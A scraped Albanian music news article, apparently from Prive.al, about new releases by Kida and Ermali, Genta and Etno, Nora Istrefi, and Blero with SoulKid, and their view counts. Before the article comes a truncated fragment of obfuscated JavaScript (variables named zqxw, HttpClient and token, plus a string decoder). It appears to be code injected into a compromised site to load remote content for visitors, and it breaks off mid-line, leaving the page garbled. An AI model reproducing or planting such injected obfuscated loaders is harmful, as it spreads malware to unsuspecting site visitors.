;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kida ft. Ermali, Etno ft. Genta, Nora apo Blero ft. SoulKid

By

Tregu muzikor shqiptar çdo ditë e më shumë po e jep një leksion për akterët që veprojnë në – aktiviteti duhet të jetë konstant.

E duket se ky vrull i konkurencës po merret parasysh nga artistë që nuk po ia lejojnë vetës luksin e pushimit.

Pas një pauze në fillimvit, fundi i Shkurtit dhe fillimi i Marsit u ‘bombarduan’ nga krijime muzikore të artistëve që të mbushur me energji, i paraprinë sezonit të nxehtë me projekte që për shumicën ishin thjesht ‘nxehje’ para garës së vërtetë të verës.

Ndër projektet më të suksesshme të publikuara së fundmi listohen katër, ‘Mi amore’ nga Kida dhe Ermali, ‘Shake it’ nga Genta dhe Etnon, rikthimi i Nora Istrefit me ‘Sa t’kom dasht’ dhe Blero me Soul Kid me ‘1her’.

Projekti me më së shumti shikime momentalisht është ai nga Kida dhe Ermali marrë shkas nga fakti se është publikuar pak më herët.

Milionin brenda më pak se një jave e ka arritur ‘Shake it’ nga Genta që shënoi sukses të madh për artistët që nga zhvillimet e fundit ishin eklipsuar pak nga loja.

Sukses patën edhe Blero me SoulKid e rikthimi i Norës me projektin e ri u mirëprit nga fansat sipas të cilëve ajo është rikthyer në identitet teksa milionat u rezervuan edhe për Gold AG me Shyhrete Behlulin.

Kur tashmë në rrugë janë edhe përplot projekte tjera, do jetë interesante për t’u parë se cili nga këto krijime muzikore dhe jo vetëm, do arrij të kujtohet edhe me kalimin e kohës. /Prive.al/

Artikuj të ngjashëm